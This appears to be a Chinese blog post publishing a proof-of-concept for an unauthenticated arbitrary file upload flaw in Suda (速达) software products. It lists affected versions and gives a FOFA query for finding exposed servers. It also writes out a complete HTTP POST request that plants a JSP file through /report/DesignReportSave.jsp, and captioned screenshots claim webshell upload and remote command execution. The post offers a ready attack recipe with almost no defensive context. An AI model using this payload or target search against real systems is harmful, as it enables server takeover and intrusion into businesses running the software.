Pages

Menu

Babing
Published on 2024-08-30 / 2 Visits
0
0

S21-1速达软件-全产品-文件上传

#Pocs

S21-1速达软件-全产品-文件上传

漏洞描述:

速达软件全系产品存在任意[文件上传漏洞](https://so.csdn.net/so/search?q=%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E&spm=1001.2101.3001.7020),未经身份认证得攻击者可以通过此漏洞上传恶意后门文件,执行任意指令,造成服务器失陷

影响版本:

速达A3.cloud BAS<br />速达A3.cloud STD<br />速达A30.cloud PRO<br />速达3000.online PRO<br />速达A4.cloud BAS<br />速达A4.cloud STD<br />速达A40.cloud PRO<br />速达4000.online PRO<br />速达A5.cloud STD<br />速达A50.cloud PRO<br />速达A70.cloud PRO<br />速达5000.online PRO<br />速达7000.online PRO

网站图片:

image-20240625140712119

网络测绘:

fofa语法:

FOFA:app=“速达软件-公司产品”

漏洞复现:

payload:

POST /report/DesignReportSave.jsp?report=/文件名 HTTP/1.1
Host: your-ip
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Type: application/octet-stream
Connection: close

<% out.print("test");%>

效果图:
image-20240619154453925
验证
image-20240619154503399
上传马子
image-20240619154509582
RCE
image-20240619154514570

S22-1商混-ERP系统-SQL
S20-1Sugar-CRM系统-...

Comment